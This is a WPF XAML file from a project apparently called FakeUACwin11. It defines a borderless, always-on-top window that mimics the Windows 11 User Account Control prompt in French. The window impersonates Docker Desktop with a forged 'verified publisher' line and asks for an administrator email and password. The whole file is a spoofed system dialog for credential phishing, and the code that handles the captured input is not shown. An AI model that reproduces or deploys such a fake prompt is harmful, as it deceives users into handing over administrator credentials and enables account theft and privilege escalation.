FakeUACwin11/MainWindow.xaml

<Window x:Class="FakeUACwin11.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:FakeUACwin11"
        mc:Ignorable="d"
        Topmost="True"
        WindowStartupLocation="CenterScreen"
        Title="Contrôle de compte d'utilisateur" Height="546" Width="454"
        AllowsTransparency="True" WindowStyle='None' Background="Transparent" ResizeMode='NoResize'
        MouseDown="Win_Click">
    <Window.Resources>
        <Style x:Key="TextBoxStyle" TargetType="{x:Type Control}">
            <Style.Triggers>
                <Trigger Property="IsFocused" Value="True">
                    <Setter Property="Background" Value="White"/>
                    <Setter Property="Foreground" Value="Black"/>
                </Trigger>
                <Trigger Property="IsFocused" Value="False">
                    <Setter Property="Background" Value="#171717"/>
                    <Setter Property="Foreground" Value="WhiteSmoke"/>
                </Trigger>
            </Style.Triggers>
        </Style>
    </Window.Resources>
    <Border CornerRadius="15" BorderThickness="0" BorderBrush="Transparent" Background="#404040">
        <Grid>
            <Grid.RowDefinitions>
                <RowDefinition Height="40"></RowDefinition>
                <RowDefinition Height="*"></RowDefinition>
            </Grid.RowDefinitions>
            <!-- Custom Title Bar -->
            <Grid Background="#404040" Margin="5" Grid.Row="0">
                <Grid.ColumnDefinitions>
                    <ColumnDefinition Width="*"/>
                    <ColumnDefinition Width="Auto"/>
                </Grid.ColumnDefinitions>
                <TextBlock Text="Contrôle de compte d'utilisateur" Foreground="WhiteSmoke" VerticalAlignment="Center" Margin="10" FontSize="10"/>
                <Button Content="&#x2716;" FontFamily="Segoe UI Symbol" FontSize="13" HorizontalAlignment="Right" Padding="15 5" Margin="10 0 10 0" Background="Transparent" Click="CloseButton_Click" BorderBrush="Transparent">
                </Button>
            </Grid>

            <!-- UAC Content -->
            <StackPanel Background="#2f2f2f" Grid.Row="1" Name="MainPanel" Margin="2,0,2,10">
                <TextBlock Text="Voulez-vous autoriser cette application à apporter des modifications à votre appareil ?" TextWrapping="Wrap" Background="#404040" Foreground="WhiteSmoke" FontWeight="Normal" FontSize="20" Padding="10" Margin="0 0"/>

                <StackPanel Orientation="Horizontal" Margin="25 10">
                    <Image Source="/app_icon.png" Width="50" Height="50"/>
                    <TextBlock Text="Docker Desktop" Foreground="WhiteSmoke" VerticalAlignment="Center" Margin="10 0" FontSize="20" FontWeight="Normal"/>
                </StackPanel>

                <TextBlock Text="Éditeur vérifié : Docker Inc" Margin="20 5 20 0" Foreground="WhiteSmoke" FontSize="14"/>
                <TextBlock Text="Origine du fichier : Disque dur sur cet ordinateur" Margin="20 0 20 0" Foreground="WhiteSmoke" FontSize="14"/>

                <TextBlock Text="Afficher plus de détail" Foreground="#0078D7" FontWeight="Bold" Margin="20 20 20 5" FontSize="15"/>

                <TextBlock Text="Pour continuer, tapez un nom et un mot de passe d'administrateur." Foreground="WhiteSmoke" Margin="20 5" TextWrapping="Wrap" HorizontalAlignment="Left" Width="350" FontSize="14"/>

                <TextBlock Text="Adresse de messagerie :" Margin="20 5 20 0" TextWrapping="Wrap" HorizontalAlignment="Left" Foreground="WhiteSmoke" Width="450" FontSize="12"/>
                <TextBox Name="Username" Margin="20 0 20 5" Width="344" Height="35" Style="{StaticResource TextBoxStyle}" BorderThickness="2" HorizontalAlignment="Left" FontSize="16" Padding="10,5" />
                <TextBlock Text="Mot de passe :" Margin="20 5 20 0" TextWrapping="Wrap" HorizontalAlignment="Left" Foreground="WhiteSmoke" Width="450" FontSize="12"/>
                <PasswordBox Name="Password" Margin="20 0 20 5" Width="344" Height="35" Style="{StaticResource TextBoxStyle}" BorderThickness="2" HorizontalAlignment="Left" FontSize="16" Padding="10,5"/>

                <TextBlock Text="{StaticResource PermissionDomain}" Margin="20 10 20 10" Foreground="WhiteSmoke" FontSize="14"/>

                <StackPanel Orientation="Horizontal" HorizontalAlignment="Stretch" Margin="20 10">
                    <Button Content="Oui" Name="YesButton" Click="YesButton_Click" Margin="5 0" Background="#404040" Foreground="WhiteSmoke" BorderThickness="0" FontSize="16" Width="194" Padding="5"/>
                    <Button Content="Non" Click="NoButton_Click" Margin="5 0" Background=" #60cdff" BorderThickness="0" FontSize="16" Width="194"/>
                </StackPanel>
            </StackPanel>
        </Grid>
    </Border>
</Window>
